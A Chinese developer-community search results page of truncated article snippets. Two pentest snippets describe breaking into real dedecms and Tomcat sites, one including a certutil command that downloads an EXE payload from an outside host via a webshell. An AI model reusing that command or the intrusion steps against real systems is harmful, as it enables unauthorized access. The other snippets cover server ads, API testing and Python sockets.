首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    dedecms漏洞组合拳(渗透笔记)

    dedecms漏洞组合拳(渗透笔记) 前言 之前也写过几篇关于dedecms漏洞复现的文章了,光是复现也没什么意思,于是利用google hacking技巧,找到了一个使用dede的站点,正好用上了之前几篇文章里提到的所有的技术...mark 这里需要更正一下,我在拿到这个的时候,先是扫了一下目录,毕竟要先确定是否找得到后台,不然拿到密码也没用。...mark 反正就是拿到管理员的密码了,直接登上服务器,在本地执行了一下net命令,还是不能用,那我就不用呗,我直接去账户管理里操作,创建用户没什么问题,就是到了添加管理员时,禁止访问!...想着都拿到服务器了,就先放着了,这个问题也还没解决….望大佬告知

    2.7K50

    浅析:TomCat Getshell服务器权限实战

    浅析:TomCat Getshell服务器权限实战 0xOO前言 无意中接触到一个网站 所以索性尝试一下 没什么技术性 都是一些基本操作 大佬看看就可以了奥 注:由于保密问题 所有关于对方信息网址等各项信息都将保密打上马赛克...user image.png 0x02 权限移交MetaSploit(Msf) 尝试使用shellcode制作payload image.png image.png 编译后利用webshell上传到服务器...有最快捷的方法把payload上传到服务器( 记得一定要内网穿透哦 ) 第一种就是使用CMD的命令certutil(然后使用CMD命令运行即可) 命令:certutil -urlcache -split...-f https://www.xxx.com/test.EXE 2.第二种就是使用webshell的上传(同理,使用CMD命令运行PAYLOAD) image.png 首先使用webshell来到服务器

    66120

    服务器是什么?

    服务器是单独为一个网站或者多个网站配置独立IP的一种服务器。企业或是用户如果想组建多个网站的话就需要用服务器了。...而服务器对外部链接的促进作用很明显,就是为了给客户提供多种IP资源,为多个网站做优化的。 服务器有哪些分类呢? 分为国内服务器,美国服务器,中国香港服务器。...可能速度比不上中国香港服务器,但是价格和配置都要比香港和韩国的便宜,带宽弹性与稳定性都是不错的。 2、中国香港服务器比国内访问速度更快更稳定,但是由于带宽成本高,导致中国香港群机器价格较贵。...如果是小型企业或是个人网站,网站的承载量不是很多的话,但对成本有比较大的要求的时候,可以考虑选择美国RAKsmart的群IP服务器。可能速度比不上香港服务器,但带宽弹性与稳定性也还不错。...其实群专用服务器也是服务器的一种,只是为群多网站专门研发的一款服务器,配备多个ip,能满足多个网站有独立的ip,保证网站在百度的排名,避免受到搜索引擎的的惩罚。

    2.6K30

    服务器有哪些优势?

    服务器是单独为一个网站或者多个网站配置独立IP的一种服务器。企业或是用户如果想组建多个网站的话就需要用服务器了。...服务器可以提高搜索引擎多个网站的关注度,提高网站文章的收录以及网站文章的访问量。服务器有哪些优势呢?...1、服务器拥有大量独立IP服务器拥有大量独立ip,有的数量多的达到两百多个,因为ip资源丰富,而且都是独立的,对群优化有着很大的作用,所以备受站长们的青睐。...5、服务器更利于优化多ip服务器指的是针对群优化用户开发的服务器,用户租用服务器来放置多个网站,很多用户为了在线上增大曝光会选择优化多个网站。...7、服务器搜索引擎惩罚的风险所谓群,就是网站的数量比较多,所以才称为“群”。

    2.7K20

    详解接口测试(2)- HTTP接口用例设计与测试方法(B练手)

    正常的接口测试流程,开发会提供接口文档) 我们设置好Charles的代理后(还不知道怎么使用Charles可以看我以前的文章《Charles从入门到精通》),打开B站网页版就可以开始抓包 经过我的一番观察,看到了B的接口地址...(json格式),text/xml(xml格式),multipart/form-data(字节流二进制格式) Content-Length:用来指明发送给接受方的消息主体的大小 HOST:它表示访问的服务器域名...如果发送HTTP请求时,携带的该字段域名无法正常解析出IP,找不到服务器资源,就会报404 Connection:值为keep-alive,表示需要持久连接(长连接) User-Agent:它说明请求是从什么浏览器发出去...来判定用户是来自于PC浏览器,还是手机APP,来返回不同的页面 Accept:表示客户端可以接收的类型,如Json Accept-Encoding:设置为gzip、deflate、br,表示可以支持的Web服务器返回内容压缩编码类型

    1.2K21

    看我如何拿下BC服务器

    一、信息收集 拿到目标网站,可见是一个很常规的bc。 先进行简单的信息收集,通过Wappalyzer插件可见php版本与windows serve这两个比较重要的信息 ?...在扫描之余尝试3389连接远程桌面(因为开始已经看到是windows serve的服务器) ? 试了两次,猜测是修改端口了,或者是登录ip白名单?...嘻嘻,成功登录,拿下服务器,随即点了根烟,将所有证据打包好,掏出了手机拨打110 七、总结 在我们拿下webshell的时候,想要获取数据或者源码往往会用菜刀或者蚁剑去打包,但是这个时候往往就会出现很多问题...这个时候如果对方是windows服务器的话,我们可以将我们本地装的winrar.exe上传过去 ?

    1.7K40

    【说】python中socket如何建立服务器

    python中socket如何建立服务器 说明 1、创建socket对象。 2、将socket绑定到指定地址。 3、绑定后必须准备好套接字。 以便接收连接。 4、服务器套接字符等待客户请求连接。...5、服务器和客户通过send和reext通信。...6、调用socket关闭连接 实例 import socket #引入套接字模块 #因为服务器需要同时响应多个客户端的请求,每一个连接都需要一个进程或新线程#1处理,否则一次只能服务一个客户 import...第一个元素是一个新的 socket 对象         #服务器通过它与客户端通信;第二个元素是客户的互联网地址         sock,addr = server_socket.accept() ...%addr)   def main():     socket_server()   if __name__ =='__main__':     main() 以上就是python中socket建立服务器的方法

    1K20
    领券